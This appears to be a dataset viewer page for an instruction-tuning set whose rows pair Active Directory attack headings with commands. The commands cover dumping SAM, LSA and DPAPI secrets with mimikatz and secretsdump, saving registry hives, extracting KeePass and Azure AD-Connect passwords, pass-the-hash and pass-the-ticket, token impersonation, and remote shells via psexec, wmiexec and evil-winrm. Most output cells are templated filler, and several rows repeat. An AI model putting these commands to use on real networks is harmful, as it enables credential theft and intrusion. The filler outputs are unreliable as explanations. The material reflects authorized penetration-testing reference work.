instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Extract credentials from SAM | nxc smb <ip_range> -u <user> -p <password> --sam | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Extract credentials from SAM | msf> hashdump | Tool or command referenced under 'Extract credentials from SAM'. |
Extract credentials from SAM | mimikatz "privilege::debug" "lsadump::sam" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | secretsdump.py <domain>/<user>:<password>@<ip> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | reg save HKLM\SAM <file>; reg save HKLM\SYSTEM <file> | Note or procedural step under 'Extract credentials from SAM'. |
Extract credentials from SAM | secretsdump.py -system SYSTEM -sam SAM LOCAL | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share' | Note or procedural step under 'Extract credentials from SAM'. |
Extract credentials from SAM | secretsdump.py -system SYSTEM -sam SAM LOCAL | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | regsecrets.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Extract credentials from SAM'. |
Extract credentials from LSA | nxc smb <ip_range> -u <user> -p <password> --lsa | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Extract credentials from LSA | mimikatz "privilege::debug" "lsadump::lsa" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from LSA | reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file> | Note or procedural step under 'Extract credentials from LSA'. |
Extract credentials from LSA | secretsdump.py -system SYSTEM -security SECURITY | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from LSA | reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share' | Note or procedural step under 'Extract credentials from LSA'. |
Extract credentials from DPAPI | DPAPI | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | nxc smb <ip_range> -u <user> -p <password> --dpapi [cookies] [nosystem] | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Extract credentials from DPAPI | donpapi <domain>/<user>:<password>@<target> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | dpapidump.py <domain>/<user>:<password>@<target> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | get masterkey | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | mimikatz "sekurlsa::dpapi" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from DPAPI | dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | lsassy -d <domain> -u <user> -p <password> <ip> -m rdrleakdiag -M masterkeys | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | SharpDPAPI.exe triage | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | Crack users masterkey | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | copy c:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | DPAPImk2john.py --preferred <prefered_file> | Tool or command referenced under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | DPAPImk2john.py -c domain -mk <masterkey> -S <sid> #DPAPImk | Tool or command referenced under 'Extract credentials from DPAPI'. |
Impersonate | Impersonate | Note or procedural step under 'Impersonate'. |
Impersonate | msf> use incognito impersonate_token <domain>\\<user> | Tool or command referenced under 'Impersonate'. |
Impersonate | nxc smb <ip> -u <localAdmin> -p <password> --loggedon-users | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Impersonate | nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Impersonate | irs.exe list | Note or procedural step under 'Impersonate'. |
Impersonate | irs.exe exec -p <pid> -c <command> | Note or procedural step under 'Impersonate'. |
Impersonate | Impersonate with adcs | Note or procedural step under 'Impersonate'. |
Impersonate | masky - d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip> | Note or procedural step under 'Impersonate'. |
Impersonate | Impersonate RDP Session | Note or procedural step under 'Impersonate'. |
Impersonate | psexec.exe -s -i cmd | Note or procedural step under 'Impersonate'. |
Impersonate | query user | Note or procedural step under 'Impersonate'. |
Impersonate | tscon.exe <id> /dest:<session_name> #RDP | Note or procedural step under 'Impersonate'. |
Misc | Find Users | Note or procedural step under 'Misc'. |
Misc | smbmap.py --host-file ./computers.list -u <user> -p <password> -d <domain> -r 'C$\Users' --dir-only --no-write-check --no-update --no-color --csv users_directory.csv | Note or procedural step under 'Misc'. |
Misc | Extract Keepass | Note or procedural step under 'Misc'. |
Misc | KeePwn.py plugin add -u '<user>' -p '<password>' -d '<domain>' -t <target> --plugin KeeFarceRebornPlugin.dll | Note or procedural step under 'Misc'. |
Misc | KeePwn.py trigger add -u '<user>' -p '<password>' -d '<domain>' -t <target> | Note or procedural step under 'Misc'. |
Misc | Hybrid (Azure AD-Connect) | Note or procedural step under 'Misc'. |
Misc | Dump cleartext password of MSOL Account on ADConnect Server | Note or procedural step under 'Misc'. |
Misc | azuread_decrypt_msol_v2.ps1 #DCSYNC | Note or procedural step under 'Misc'. |
Misc | nxc smb <ip> -u <user> -p <password> -M msol #DCSYNC | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | Interactive-shell - psexec | Note or procedural step under 'Clear text Password'. |
Clear text Password | psexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | psexec.exe -AcceptEULA \\<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | psexecsvc.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | Pseudo-shell (file write and read) | Note or procedural step under 'Clear text Password'. |
Clear text Password | atexec.py <domain>/<user>:<password>@<ip> "command" | Note or procedural step under 'Clear text Password'. |
Clear text Password | smbexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | wmiexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | dcomexec.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | nxc smb <ip_range> -u <user> -p <password> -d <domain> -x <cmd> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | WinRM | Note or procedural step under 'Clear text Password'. |
Clear text Password | evil-winrm -i <ip> -u <user> -p <password> | Note or procedural step under 'Clear text Password'. |
Clear text Password | Enter-PSSession -ComputerName <computer> -Credential <domain>\<user> | Note or procedural step under 'Clear text Password'. |
Clear text Password | nxc winrm <ip_range> -u <user> -p <password> -d <domain> -x <cmd> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | RDP | Note or procedural step under 'Clear text Password'. |
Clear text Password | xfreerdp /u:<user> /d:<domain> /p:<password> /v:<ip> | Note or procedural step under 'Clear text Password'. |
Clear text Password | SMB | Note or procedural step under 'Clear text Password'. |
Clear text Password | smbclient.py <domain>/<user>:<password>@<ip> | SMB client usage to list or access network shares. |
Clear text Password | smbclient-ng.py -d <domain> -u <user> -p <password> --host <ip> | SMB client usage to list or access network shares. |
Clear text Password | MSSQL | Note or procedural step under 'Clear text Password'. |
Clear text Password | nxc mssql <ip_range> -u <user> -p <password> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip> | Note or procedural step under 'Clear text Password'. |
NT Hash | Pass the Hash | Note or procedural step under 'NT Hash'. |
NT Hash | mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
NT Hash | RDP | Note or procedural step under 'NT Hash'. |
NT Hash | reg.py <domain>/<user>@<ip> -hashes ':<hash>' add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0' | Note or procedural step under 'NT Hash'. |
NT Hash | WinRM | Note or procedural step under 'NT Hash'. |
NT Hash | evil-winrm -i <ip> -u <user> -H <hash> | Note or procedural step under 'NT Hash'. |
NT Hash | Overpass the Hash / Pass the key (PTK) | Note or procedural step under 'NT Hash'. |
NT Hash | Rubeus.exe asktgt /user:victim /rc4:<rc4value> | Tool or command referenced under 'NT Hash'. |
NT Hash | Rubeus.exe ptt /ticket:<ticket> | Tool or command referenced under 'NT Hash'. |
NT Hash | Rubeus.exe createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe] | Tool or command referenced under 'NT Hash'. |
NT Hash | getTGT.py <domain>/<user> -hashes :<hashes> | Note or procedural step under 'NT Hash'. |
NT Hash | getTGT.py <domain>/<user> -hashes :<hashes> | Note or procedural step under 'NT Hash'. |
Kerberos | Pass the Ticket (ccache / kirbi) | Note or procedural step under 'Kerberos'. |
Kerberos | Convert Format | Note or procedural step under 'Kerberos'. |
Kerberos | ticketConverter.py <kirbi||ccache> <ccache||kirbi> | Note or procedural step under 'Kerberos'. |
Kerberos | export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache | Note or procedural step under 'Kerberos'. |
Kerberos | impacket tools: Same as Pass the hash but use : -k and -no-pass for impacket | Note or procedural step under 'Kerberos'. |
Kerberos | mimikatz kerberos::ptc "<ticket>" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Kerberos | Rubeus.exe ptt /ticket:<ticket> | Tool or command referenced under 'Kerberos'. |
Kerberos | proxychains secretsdump.py -k'<domain>'/'<user>'@'<ip>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Kerberos | Modify SPN | Note or procedural step under 'Kerberos'. |
Kerberos | tgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice "<service>/<target>" #pr 1256 | Note or procedural step under 'Kerberos'. |
Kerberos | Aeskey | Note or procedural step under 'Kerberos'. |
Kerberos | impacket tools: Same as Pass the hash but use : -aesKey for impacket (and use FQDN) | Note or procedural step under 'Kerberos'. |
Kerberos | proxychains secretsdump.py -aesKey <key> '<domain>'/'<user>'@'<ip>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Socks (relay) | proxychains lookupsid.py <domain>/<user>@<ip> -no-pass -domain-sids | Note or procedural step under 'Socks (relay)'. |
Socks (relay) | proxychains mssqlclient.py -windows-auth <domain>/<user>@<ip> -no-pass | Note or procedural step under 'Socks (relay)'. |
Socks (relay) | proxychains secretsdump.py -no-pass '<domain>'/'<user>'@'<ip>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Socks (relay) | proxychains smbclient.py -no-pass <user>@<ip> | SMB client usage to list or access network shares. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.